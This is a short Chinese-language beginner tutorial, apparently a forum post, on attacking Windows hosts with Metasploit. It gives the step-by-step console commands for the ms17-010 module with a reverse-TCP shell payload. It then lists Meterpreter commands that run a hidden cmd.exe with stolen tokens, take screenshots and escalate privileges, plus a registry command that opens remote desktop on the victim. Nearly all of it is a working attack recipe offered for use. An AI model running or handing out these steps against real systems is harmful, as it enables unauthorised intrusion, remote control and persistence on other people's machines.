本人太渣,所以寫了這個基礎篇供一些小白和新手看,大佬們手下留情。
這是個基礎篇。。。。。
這幾天在培訓第一次接觸Metasploit,沒有我原來想象中那么麻煩,真的上手很方便 嘻嘻嘻嘻~~~~o(* ̄▽ ̄*)o
kali集成了Metasploit,所以我用的我是kali。打開kali終端,輸入msfconsole.等待Metasploit加載。成功之后終端前面會變成這樣:msf>
以下是命令以及解釋:msf>search ms17-010
//查找metasploit框架中的滲透攻擊模塊。
msf > use XXX //裝載一個滲透攻擊或模塊
msf > show payloads
//輸出很多可用的攻擊載荷
msf > set payload windows/shell_reverse_tcp //指定想要使用的攻擊載荷。反彈型的鏈接方式,可以繞過防火牆
msf > set RHOST 滲透目標主機的IP地址
msf > set LHOST 本機IP
msf >show targets
輸出各種版本的操作系統代號,根據目標操作系統版本選擇。
msf >set target XX
msf >show options //輸出設置清單,可進行修正
msf >exploit 或者 run //沒有錯誤,即可進行攻擊了。
進去之后顯示 meterpret
分割線啦啦啦啦~~~~~~
常用命令:
execute -f cmd.exe -i 執行cmd.exe命令並進行交互。
execute -f cmd.exe -i -t 以所有可用令牌來執行cmd命令。
execute -f cmd.exe -i -H -t 以所有可用令牌來執行cmd命令並隱藏該進程。
screenshot 對目標主機的屏幕進行截圖。
use priv 加載特權提升擴展模塊,來擴展meterpreter庫。
開啟3389端口命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
我實例多次,對Windows XP 和2003系統有用的,不用重起,只要對方是外網,行后方可連接3389終端